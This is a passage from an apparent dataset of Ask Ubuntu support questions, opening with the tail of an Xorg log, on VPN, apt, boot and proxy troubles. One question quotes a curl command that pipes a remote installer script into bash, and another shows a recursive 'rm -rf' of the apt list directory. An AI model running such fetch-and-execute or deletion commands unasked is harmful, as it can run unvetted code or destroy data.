fbioputcmap : invalid argument ( ee ) fbdev ( 0 ) : fbioputcmap : invalid argument ( ee ) fbdev ( 0 ) : fbioputcmap : invalid argument ( ee ) fbdev ( 0 ) : fbioputcmap : invalid argument ( == ) fbdev ( 0 ) : dpms enabled ( == ) randr enabled ( ii ) initializing built-in extension generic event extension ( ii ) initializing built-in extension shape ( ii ) initializing built-in extension mit-shm ( ii ) initializing built-in extension xinputextension ( ii ) initializing built-in extension xtest ( ii ) initializing built-in extension big-requests ( ii ) initializing built-in extension sync ( ii ) initializing built-in extension xkeyboard ( ii ) initializing built-in extension xc-misc ( ii ) initializing built-in extension security ( ii ) initializing built-in extension xinerama ( ii ) initializing built-in extension xfixes ( ii ) initializing built-in extension render ( ii ) initializing built-in extension randr ( ii ) initializing built-in extension composite ( ii ) initializing built-in extension damage ( ii ) aiglx : screen 0 is not dri2 capable ( ii ) aiglx : screen 0 is not dri capable ( ii ) aiglx : loaded and initialized swrast ( ii ) glx : initialized driswrast gl provider for screen 0 ( ii ) xkb : generating xkmfile /tmp/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm ( ii ) xkb : reusing cached keymap ( ii ) config/udev : adding input device tps65217_pwr_but ( /dev/input/event0 ) ( ** ) tps65217_pwr_but : applying inputclass `` evdev keyboard catchall '' ( ii ) loadmodule : `` evdev '' ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so ( ii ) module evdev : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 2.7.0 module class : x.org xinput driver abi class : x.org xinput driver , version 16.0 ( ii ) using input driver 'evdev ' for 'tps65217_pwr_but' ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so option `` xkbrules '' `` evdev '' option `` xkb_model '' `` pc105 '' option `` xkb_layout '' `` us '' option `` _source '' `` server/udev '' option `` name '' `` tps65217_pwr_but '' option `` path '' `` /dev/input/event0 '' option `` device '' `` /dev/input/event0 '' option `` config_info '' `` udev : /sys/devices/ocp.2/44e0b000.i2c/i2c-0/0-0024/input/input0/event0 '' option `` driver '' `` evdev '' ( ** ) tps65217_pwr_but : always reports core events ( ** ) evdev : tps65217_pwr_but : device : `` /dev/input/event0 '' ( -- ) evdev : tps65217_pwr_but : vendor 0 product 0 ( -- ) evdev : tps65217_pwr_but : found keys ( ii ) evdev : tps65217_pwr_but : configuring as keyboard ( ** ) option `` config_info '' `` udev : /sys/devices/ocp.2/44e0b000.i2c/i2c-0/0-0024/input/input0/event0 '' ( ii ) xinput : adding extended input device `` tps65217_pwr_but '' ( type : keyboard , id 6 ) ( ** ) option `` xkb_rules '' `` evdev '' ( ** ) option `` xkb_model '' `` pc105 '' ( ** ) option `` xkb_layout '' `` us '' ( ii ) xkb : reusing cached keymap ( ii ) config/udev : adding input device motorola mobility motorola hd dock ( /dev/input/event1 ) ( ** ) motorola mobility motorola hd dock : applying inputclass `` evdev keyboard catchall '' ( ii ) using input driver 'evdev ' for 'motorola mobility motorola hd dock' ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so option `` xkbrules '' `` evdev '' option `` xkb_model '' `` pc105 '' option `` xkb_layout '' `` us '' option `` _source '' `` server/udev '' option `` name '' `` motorola mobility motorola hd dock '' option `` path '' `` /dev/input/event1 '' option `` device '' `` /dev/input/event1 '' option `` config_info '' `` udev : /sys/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.1/1-1.1:1.0/input/input1/event1 '' option `` driver '' `` evdev '' ( ** ) motorola mobility motorola hd dock : always reports core events ( ** ) evdev : motorola mobility motorola hd dock : device : `` /dev/input/event1 '' ( -- ) evdev : motorola mobility motorola hd dock : absolute axis 0x20 [ 548..0 ] ( -- ) evdev : motorola mobility motorola hd dock : vendor 0x22b8 product 0x938 ( -- ) evdev : motorola mobility motorola hd dock : found 1 mouse buttons ( -- ) evdev : motorola mobility motorola hd dock : found absolute axes ( ii ) evdev : motorola mobility motorola hd dock : forcing absolute x/y axes to exist . ( -- ) evdev : motorola mobility motorola hd dock : found keys ( ii ) evdev : motorola mobility motorola hd dock : configuring as mouse ( ii ) evdev : motorola mobility motorola hd dock : configuring as keyboard ( ** ) evdev : motorola mobility motorola hd dock : yaxismapping : buttons 4 and 5 ( ** ) evdev : motorola mobility motorola hd dock : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 ( ** ) option `` config_info '' `` udev : /sys/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.1/1-1.1:1.0/input/input1/event1 '' ( ii ) xinput : adding extended input device `` motorola mobility motorola hd dock '' ( type : keyboard , id 7 ) ( ** ) option `` xkb_rules '' `` evdev '' ( ** ) option `` xkb_model '' `` pc105 '' ( ** ) option `` xkb_layout '' `` us '' ( ii ) xkb : reusing cached keymap ( ii ) evdev : motorola mobility motorola hd dock : initialized for absolute axes . ( ** ) motorola mobility motorola hd dock : ( accel ) keeping acceleration scheme 1 ( ** ) motorola mobility motorola hd dock : ( accel ) acceleration profile 0 ( ** ) motorola mobility motorola hd dock : ( accel ) acceleration factor : 2.000 ( ** ) motorola mobility motorola hd dock : ( accel ) acceleration threshold : 4 ( ii ) config/udev : adding input device motorola usb keyboard [ us basic ] ( /dev/input/event2 ) ( ** ) motorola usb keyboard [ us basic ] : applying inputclass `` evdev keyboard catchall '' ( ii ) using input driver 'evdev ' for 'motorola usb keyboard [ us basic ] ' ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so option `` xkbrules '' `` evdev '' option `` xkb_model '' `` pc105 '' option `` xkb_layout '' `` us '' option `` _source '' `` server/udev '' option `` name '' `` motorola usb keyboard [ us basic ] '' option `` path '' `` /dev/input/event2 '' option `` device '' `` /dev/input/event2 '' option `` config_info '' `` udev : /sys/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.3/1-1.3:1.0/input/input2/event2 '' option `` driver '' `` evdev '' ( ** ) motorola usb keyboard [ us basic ] : always reports core events ( ** ) evdev : motorola usb keyboard [ us basic ] : device : `` /dev/input/event2 '' ( -- ) evdev : motorola usb keyboard [ us basic ] : vendor 0x22b8 product 0x93a ( -- ) evdev : motorola usb keyboard [ us basic ] : found keys ( ii ) evdev : motorola usb keyboard [ us basic ] : configuring as keyboard ( ** ) option `` config_info '' `` udev : /sys/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.3/1-1.3:1.0/input/input2/event2 '' ( ii ) xinput : adding extended input device `` motorola usb keyboard [ us basic ] '' ( type : keyboard , id 8 ) ( ** ) option `` xkb_rules '' `` evdev '' ( ** ) option `` xkb_model '' `` pc105 '' ( ** ) option `` xkb_layout '' `` us '' ( ii ) xkb : reusing cached keymap ( ii ) config/udev : adding input device motorola usb keyboard [ us basic ] ( /dev/input/event3 ) ( ** ) motorola usb keyboard [ us basic ] : applying inputclass `` evdev pointer catchall '' ( ** ) motorola usb keyboard [ us basic ] : applying inputclass `` evdev keyboard catchall '' ( ii ) using input driver 'evdev ' for 'motorola usb keyboard [ us basic ] ' ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so option `` xkbrules '' `` evdev '' option `` xkb_model '' `` pc105 '' option `` xkb_layout '' `` us '' option `` _source '' `` server/udev '' option `` name '' `` motorola usb keyboard [ us basic ] '' option `` path '' `` /dev/input/event3 '' option `` device '' `` /dev/input/event3 '' option `` config_info '' `` udev : /sys/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.3/1-1.3:1.1/input/input3/event3 '' option `` driver '' `` evdev '' ( ** ) motorola usb keyboard [ us basic ] : always reports core events ( ** ) evdev : motorola usb keyboard [ us basic ] : device : `` /dev/input/event3 '' ( -- ) evdev : motorola usb keyboard [ us basic ] : vendor 0x22b8 product 0x93a ( -- ) evdev : motorola usb keyboard [ us basic ] : found 9 mouse buttons ( -- ) evdev : motorola usb keyboard [ us basic ] : found scroll wheel ( s ) ( -- ) evdev : motorola usb keyboard [ us basic ] : found relative axes ( -- ) evdev : motorola usb keyboard [ us basic ] : found x and y relative axes ( -- ) evdev : motorola usb keyboard [ us basic ] : found keys ( ii ) evdev : motorola usb keyboard [ us basic ] : configuring as mouse ( ii ) evdev : motorola usb keyboard [ us basic ] : configuring as keyboard ( ii ) evdev : motorola usb keyboard [ us basic ] : adding scrollwheel support ( ** ) evdev : motorola usb keyboard [ us basic ] : yaxismapping : buttons 4 and 5 ( ** ) evdev : motorola usb keyboard [ us basic ] : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 ( ** ) option `` config_info '' `` udev : /sys/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.3/1-1.3:1.1/input/input3/event3 '' ( ii ) xinput : adding extended input device `` motorola usb keyboard [ us basic ] '' ( type : keyboard , id 9 ) ( ** ) option `` xkb_rules '' `` evdev '' ( ** ) option `` xkb_model '' `` pc105 '' ( ** ) option `` xkb_layout '' `` us '' ( ii ) xkb : reusing cached keymap ( ii ) evdev : motorola usb keyboard [ us basic ] : initialized for relative axes . ( ** ) motorola usb keyboard [ us basic ] : ( accel ) keeping acceleration scheme 1 ( ** ) motorola usb keyboard [ us basic ] : ( accel ) acceleration profile 0 ( ** ) motorola usb keyboard [ us basic ] : ( accel ) acceleration factor : 2.000 ( ** ) motorola usb keyboard [ us basic ] : ( accel ) acceleration threshold : 4 ( ii ) config/udev : adding input device motorola usb keyboard [ us basic ] ( /dev/input/mouse0 ) ( ii ) no input driver specified , ignoring this device . ( ii ) this device may have been added with another device file . ( ii ) evdev : motorola usb keyboard [ us basic ] : close ( ii ) unloadmodule : `` evdev '' ( ii ) unloading evdev ( ii ) evdev : motorola usb keyboard [ us basic ] : close ( ii ) unloadmodule : `` evdev '' ( ii ) unloading evdev ( ii ) evdev : motorola mobility motorola hd dock : close ( ii ) unloadmodule : `` evdev '' ( ii ) unloading evdev ( ii ) evdev : tps65217_pwr_but : close ( ii ) unloadmodule : `` evdev '' ( ii ) unloading evdev ddxsiggiveup : closing log server terminated successfully ( 0 ) . closing log file .
347345	usb to serial converter - no serial number	i have tried a lot of usb- > serial converters but none report its iserial number in udev . this makes it impossible to distinguish between adaptors . this is a problem if they are moved from one usb slot to annother . is this a problem with udev or with the adaptors ? is there any usb to serial converters reporting the serial number the correct way ?
347348	scilab icon not displayed properly	i updated ubuntu from 12.10 to 13.04 . after this , scilab icon has changed to question mark ( ? ) but it is working . how to solve this issue ?
347349	cisco anyconnect 3.1 with ubuntu 12.04 64-bit . constant disconnects	i 'm trying to use ubuntu to connect to our companies cisco vpn gateway . anyconnect installs fine , and the initial login works . traffic then works for about 30 seconds , after which it goes into a repeating cycle of working for 10s , being down for 30s & re-connecting with a message about dpd failure . the problem seems very specific to this combination of software . anyconnect linux 2.5 64 in ubuntu 12.04 : works . anyconnect linux 3.0 64 in ubuntu 12.04 : works . anyconnect windows 3.1 in win7 : works . anyconnect linux 3.1 32-bit in ubuntu 12.04 32-bit : works anyconnect linux 3.1 64 in ubuntu 13.04 : works anyconnect linux 3.1 64 in ubuntu 12.04 : fails with above symptoms , every time . i 've seen the same behavior in a redhat 6 based distro too . any ideas what incompatibility this might be hitting and how to work around it ? thanks , -martin .
347351	laptop restarts with no warning	over the last 3 days , at random points ( or so i believe ) , my laptop restarts . and , there is nothing regular about this entire process . when the machine shuts down , it 's as if it was done so forcefully , i.e . the screen blacks out for 3-5 seconds and then it boots up . i 'm running ubuntu 12.04 and akin to some other questions of a similar type , this is not an issue of the machine overheating . psensor is installed on my machine and i regularly monitor the temperature . any help would be appreciated .
347356	update manager shows error	i ca n't install update from update manager . it gives the error : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_noobslab_apps_ubuntu_dists_precise_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . '
347357	no sound output	yesterday i installed ubuntu 12.04.3 lts alongside windows xp sp2 on my vaio vgn fs 550. there is no sound output in music player . the system is not set to mute , and all other applications are working ok how do i fix this ?
347359	terminal shows more files on desktop than there are actually	i noticed this thing today and found it to be awkward . my desktop has the following files : but upon running ls in the terminal i got the following output : a.out htc_pass.sh openmp.cpp~ test.cpp he.cpp imp gcc update commands t.cpp~ test.cpp~ he.cpp~ misirlou ( copy ) .ogg test2.cpp~ trial.c~ hello openmp.c test.c~ untitled document 1~ and it is quite clear from the terminal output that the number of files according to it is much higher than what can actually be seen . why is this happening ?
347360	`initframfs` after deleting ubuntu 12.04 partition	i was using windows xp sp2 alongside windows 7 , then tried to use ubuntu 12.04 i386 in win7 partition . after sometime i deleted the partition and extended the win 7 partition . after reboot grub rescue came : i tried to install ubuntu again but failed . i tried win 7 repair but grub rescue did n't allowed me . finally i repaired my win xp but after reboot grub rescue appeared . i used command fixmbr & fixboot , now i 'm getting 'invalid partition table ' . what to do ?
347362	dpkg-buildpackage build only one package	get source file with apt-get source , now have problem building it ( compilation error ) . there are multiple packages in debian/control , and i want to build only one of them . how ?
347363	getting rid of xauthority files	i have my ~/ directory that is being flooded by `` .xauthority.43652w '' files with `` 43652w '' being any combination of letter and digits ... i only have 40 of these files for the moment , but it 's ever growing and i do n't want to pollute my ~/ too much . any idea what should i do ?
347364	what creates /run/lock ?	i have found that it lacks /run/lock directory . and i can not find out what daemon/init script creates it . could you give me a hint ? just to make it clear : 1 . # mount /var/lib/vz/private/101 on / type simfs ( rw , relatime ) /dev/sdb on /var/lib/mysql type ext4 ( rw , noatime , relatime , barrier=1 , data=ordered ) proc on /proc type proc ( rw , relatime ) sysfs on /sys type sysfs ( rw , relatime ) devpts on /dev/pts type devpts ( rw , relatime , mode=600 , ptmxmode=000 ) varrun on /run type tmpfs ( rw , relatime ) 2 . # ls -la /run/l* ls : can not access /run/l* : no such file or directory
347368	how can i get rid of eth0:1 ?	i issued the command ifconfig then it gave me 3 entries . the first one is eth0 the second one is eth0:1 and lo . both eth0 and eth0:1 gave unique ip addresses , however i want to get rid of eth0:1 . how do you think it can possibly be done ? thanks in advance guys
347370	network simulator for ubuntu 12.04	i 'm looking for good open-source network simulator programs which i can use on my ubuntu 12.04 i know about cisco-packet tracer and i used it in my 32 bit machine earlier . but now my 64 bit machine is not able to install it . ( i know i can use wine as well ! ! ! ) . gns3 is good but it is not free i think . so are there any other network simulators that i can use on my ubuntu system . ps can anyone please also clarify as when i used packet tracer the routers etc were of cisco definitely but are there any network simulatotors where one can simulate network on other manufacturers hardware as well ?
347371	is it 100 % safe to rename a file while it 's being written ?	in ubuntu , unlike in windows , i can rename a file while it 's being written onto the hard disk ( for example because it 's the output of a program or the copy of another file ) , and i can also rename a directory containing files that are being written : the system does n't send messages like `` the file is being used , operation not allowed '' . is this renaming operation 100 % safe , or there 's a risk of creating corrupted files ? and , in the first case , what is the technical reason that makes it possible , differently from other operating systems ? ( maybe something related with linux file system structure and the use of inodes , i think ... ? ) thank you very much .
347378	remote printing problem in canon lbp 2900 shared in ubuntu 12.04 lts 32-bit	i have installed canon lbp 2900 printer in ubuntu 12.04 lts . that printer is working in ubuntu . when i give a test page or any document from ubuntu itself , the printer prints the document fine . but now , i connect to a windows xp machine as a remote desktop using remmina remote desktop . while connecting , i select the option to `` use local printer '' ; this option shares ( redirects ) the printer in ubuntu with the windows xp machine . i can see the printer windows xp , but when i print a document from there , the document is submitted in the ubuntu printer , but that document goes into a `` held state '' . please help me to over come this problem , or suggest me an apt driver for this . it is urgent , please help soon .
347379	proxy setting in firefox not set	i do n't know if it 's a general problem with firefox or if it 's just my system doing things wrong . i 've got a proxy script set up in the ubuntu network settings and set firefox to use system proxy settings . whenever i restart firefox the proxy does not work until i go to firefox settings , change the option to `` no proxy '' , confirm , and then back again on `` use system proxy '' . any idea ? ubuntu 13.04 3.8.0-30-generic # 44-ubuntu smp thu aug 22 20:54:42 utc 2013 i686 i686 i686 gnu/linux mozilla firefox 23.0
347381	how to correctly compile remote-viewer/spice protocol on ubuntu 12.04	i am trying to compile , unsuccessfully , remote-viewer/spice protocol client on ubuntu 12.04.i need version 0.5.6+ has anyone managed to get it work and which steps did you follow ? thank you
347383	boot off of ubuntu 12.04 using old kernel	here 's the thing , i was resizing my partition and gparted crashed ( i was running ubuntu 12.04 lts and windows xp sp3 dual boot ) , so now my computer wo n't boot . i wanted to try and use the ppa boot-repair to help my computer boot , so i : booted off of my original ubuntu 11.10 cd and tried to install the ppa boot-repair by yannubuntu , but sadly boot-repair is n't compatible with 11.10 . downloaded ubuntu 12.04 and put that on a thumb drive so i could use boot-repair , but my computer wo n't boot off of that because it is kind of old and does n't support pae . i want to be able to use my computer again , if i understand correctly , i can only get ubuntu 12.04 if i upgrade from 11.10 because of the pae issue . is there a way around this ? can i somehow make the thumb drive boot from ubuntu 12.04 but use a older kernel that does n't need pae ? i know that my computer can run 12.04 because it worked before . thanks a lot , developernewb edit : is it possible to deceive boot-repair into thinking i have ubuntu 12.04 so i can run it in 11.10 ?
347384	curl : ( 5 ) could n't resolve proxy 'hproxy.iitm.ac.in '	i have been using the proxy hproxy.iitm.ac.in . i 've moved out now and want to change config to no proxy . on using : curl -l https : //get.rvm.io | bash -s stable -- ruby -- autolibs=enable -- auto-dotfiles i 'm prompted with : curl : ( 5 ) could n't resolve proxy 'hproxy.iitm.ac.in' i 'm not very proficient with ubuntu ( using 12.10 ) . please , could someone tell me what configurations i need to change to be able to use curl ? edit : i 'm able to browse internet . i have also changed my ~/.bashrc to show : export http_proxy= '' '' ; export https_proxy= '' '' ; export ftp_proxy= '' '' ; but it didnt help thanks .
347386	error while opening ubuntu software center	i 'm a newbie to ubuntu and i 've got this problem where i ca n't open the software center . at the upper right part on my screen there is a red dot with a horizontal white line . while clicking on it says below ; error opening the cache e : malformed line 56 in source list/etc/apt/sources.list ( dist parse ) , e : the list of sources could not be read what should i do to overcome this issue ? update : i tried the update and what i got was : e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . update 2 : when i typed in cat /etc/apt/sources.list , all i got back was : update 3 : i did what you said and this is what happened ~ $ sudo rm -vfr /var/lib/apt/lists & & sudo apt-get update removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_source_sources’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_restricted_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_universe_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_multiverse_binary-amd64_packages’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_main_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_release’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_restricted_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_main_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_multiverse_source_sources’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_release.gpg’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_binary-amd64_packages’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_restricted_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_main_i18n_translation-en’ removed ‘/var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_raring_main_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_restricted_i18n_translation-en’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_main_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_restricted_binary-i386_packages’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_universe_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_release’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_release.gpg’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_multiverse_binary-i386_packages’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_release’ removed ‘/var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_raring_release’ removed ‘/var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_raring_release.gpg’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_restricted_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_universe_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_restricted_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_restricted_i18n_translation-en’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_main_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_multiverse_source_sources’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_restricted_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_main_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_multiverse_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_universe_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_restricted_binary-amd64_packages’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_universe_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_main_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_main_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_restricted_source_sources’ removed ‘/var/lib/apt/lists/lock’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_main_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_universe_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_main_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_multiverse_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_multiverse_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_multiverse_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_restricted_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_universe_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_restricted_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_i18n_translation-en’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_multiverse_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_multiverse_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_release.gpg’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_main_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_release’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_universe_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_main_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_universe_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_release.gpg’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_multiverse_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_main_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_restricted_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_main_i18n_translation-en’ removed ‘/var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_raring_main_binary-i386_packages’ removed directory : ‘/var/lib/apt/lists/partial’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_multiverse_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_restricted_binary-amd64_packages’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_restricted_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_universe_source_sources’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_universe_binary-i386_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_multiverse_i18n_translation-en’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_main_binary-amd64_packages’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_multiverse_i18n_translation-en’ removed ‘/var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_raring_main_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_main_binary-amd64_packages’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_multiverse_source_sources’ removed ‘/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_universe_source_sources’ removed ‘/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-backports_multiverse_binary-i386_packages’ removed directory : ‘/var/lib/apt/lists’ e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read .
347388	cinnamon installation errors	i wish to install cinnamon on my laptop . i have run the command to install cinnamon but the download does not complete . this same problem has happened when trying to update ubuntu and lubuntu . listed below is the reject details . i am resident in nz but have no clue why the error message appears . i have changed the download site to `` international '' and the nz.archive.com site does not exist . your help would be gratefully received . w : failed to fetch http : //nz.archive.ubuntu.com/ubuntu/dists/maverick-backports/main/source/sources 404 not found w : failed to fetch http : //nz.archive.ubuntu.com/ubuntu/dists/maverick-backports/restricted/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . : ~ $ sudo apt-get install cinnamon cinnamon-session cinnamon-settings reading package lists ... done building dependency tree reading state information ... done e : unable to locate package cinnamon e : unable to locate package cinnamon-session e : unable to locate package cinnamon-settings after following alaa 's answer , i get these errors : err http : //ppa.launchpad.net quantal/main sources 404 not found err http : //ppa.launchpad.net quantal/main i386 packages 404 not found w : failed to fetch ..ppa.launchpad.net/merlwiz79/cinnamon-ppa/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch ... .ppa.launchpad.net/merlwiz79/cinnamon-ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . sudo apt-get install cinnamon reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . cinnamon : depends : libgjs0-libmozjs185-1.0 but it is not installable depends : libgjs0c ( > = 1.34.0 ) but 1.32.0-1ubuntu1 is to be installed depends : cinnamon-control-center but it is not going to be installed or gnome-control-center but it is not going to be installed depends : gir1.2-gkbd-3.0 but it is not going to be installed recommends : gnome-themes-standard but it is not going to be installed recommends : nemo but it is not going to be installed recommends : cinnamon-screensaver but it is not going to be installed recommends : gir1.2-gjsdbus-1.0 but it is not going to be installed e : unable to correct problems , you have held broken packages
347392	how to fix 'the package lists or status file could not be parsed or opened ' ?	i was receiving an error earlier from a fresh install of the ubuntu server . normally i grab either ubuntu server or the mini install and go from there myself . this time when i started trying to use packages using apt-get install or apt-get update i would get an error : reading package list ... error ! e : read error - read ( 21 : is a directory ) e : the package lists or status file could not be parsed or opened . i was n't entirely sure what this meant so i searched around google and came up with a number of different solutions , some involving synaptic while others involved dpkg . i even started removing all of the 'unstable ' repositories from /etc/sources/list.d leaving only a few behind . either way i got hasty and mad and deleted the /var/lib/dpkg/ contents and i did n't make a backup . ( i 'm running it on a virtual machine so it 's not a big deal i could just reinstall but i 'd rather understand the actual problem ) . in the case that i completely screwed up dpkg and deleted essential files , is there any easy way to repair this ?
347393	manually deleted current kernel headers package	i manually deleted the linux-headers package in /usr/src/ by mistake . i ca n't get them back as the current kernel image is up-to date , so : sudo apt-get install linux-headers- $ ( uname -r ) does n't work . is there anything i can do ? thanks !
